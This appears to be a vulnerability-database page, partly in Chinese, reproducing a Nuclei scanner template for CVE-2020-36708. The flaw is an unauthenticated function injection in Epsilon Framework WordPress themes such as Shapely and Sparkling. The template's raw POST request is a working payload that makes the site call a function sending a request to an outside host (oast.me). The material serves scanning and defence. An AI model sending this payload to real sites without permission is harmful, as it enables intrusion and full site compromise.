CVE-2020-36708: WordPress Epsilon Framework Themes <=2.4.8 - Remote Code Execution

日期: 2025-08-01 | 影响软件: WordPress Epsilon Framework Themes | POC: 已公开

漏洞描述

WordPress themes including Shapely <= 1.2.7, NewsMag <= 2.4.1, Activello <= 1.4.0, Illdy <= 2.1.4, Allegiant <= 1.2.2, Newspaper X <= 1.3.1, Pixova Lite <= 2.0.5, Brilliance <= 1.2.7, MedZone Lite <= 1.2.4, Regina Lite <= 2.0.4, Transcend <= 1.1.8, Affluent <= 1.1.0, Bonkers <= 1.0.4, Antreas <= 1.0.2, Sparkling <= 2.4.8, and NatureMag Lite <= 1.0.4 contain a function injection caused by epsilon_framework_ajax_action, letting unauthenticated attackers call functions and achieve remote code execution, exploit requires no authentication.

PoC代码[已公开]

id: CVE-2020-36708

info:
  name: WordPress Epsilon Framework Themes <=2.4.8 - Remote Code Execution
  author: madrobot
  severity: critical
  description: |
    WordPress themes including Shapely <= 1.2.7, NewsMag <= 2.4.1, Activello <= 1.4.0, Illdy <= 2.1.4, Allegiant <= 1.2.2, Newspaper X <= 1.3.1, Pixova Lite <= 2.0.5, Brilliance <= 1.2.7, MedZone Lite <= 1.2.4, Regina Lite <= 2.0.4, Transcend <= 1.1.8, Affluent <= 1.1.0, Bonkers <= 1.0.4, Antreas <= 1.0.2, Sparkling <= 2.4.8, and NatureMag Lite <= 1.0.4 contain a function injection caused by epsilon_framework_ajax_action, letting unauthenticated attackers call functions and achieve remote code execution, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary code remotely, leading to full site compromise.
  remediation: |
    Update themes to the latest versions where the vulnerability is fixed or apply security patches provided by theme developers.
  reference:
    - https://www.exploit-db.com/exploits/49327
    - https://wpscan.com/vulnerability/10417
    - https://wpscan.com/vulnerability/bec52a5b-c892-4763-a962-05da7100eca5
    - https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b75c322-539d-44e9-8f26-5ff929874b67?source=cve
    - https://blog.nintechnet.com/unauthenticated-function-injection-vulnerability-fixed-in-15-wordpress-themes/
    - https://blog.nintechnet.com/unauthenticated-function-injection-vulnerability-in-wordpress-sparkling-theme/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-36708
    cwe-id: CWE-94
    epss-score: 0.90488
    epss-percentile: 0.99587
    cpe: cpe:2.3:a:colorlib:activello:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: colorlib
    product: activello
    kev: true
    vkev: true
  tags: wordpress,rce,cve,cve2020,edb,wpscan

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=https://oast.me/

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Interactsh Server"
          - "protocol_version"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d0220a2f303aebd4fa3574bb3f588b68d5c500ded6009d7d5e7b7bb92bcfcf6a022100a618d6253e0e06a2abf05d5df88fe26f6e4c9934615e8a6942b1a27201f2dcb8:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-36708.yaml

相关漏洞推荐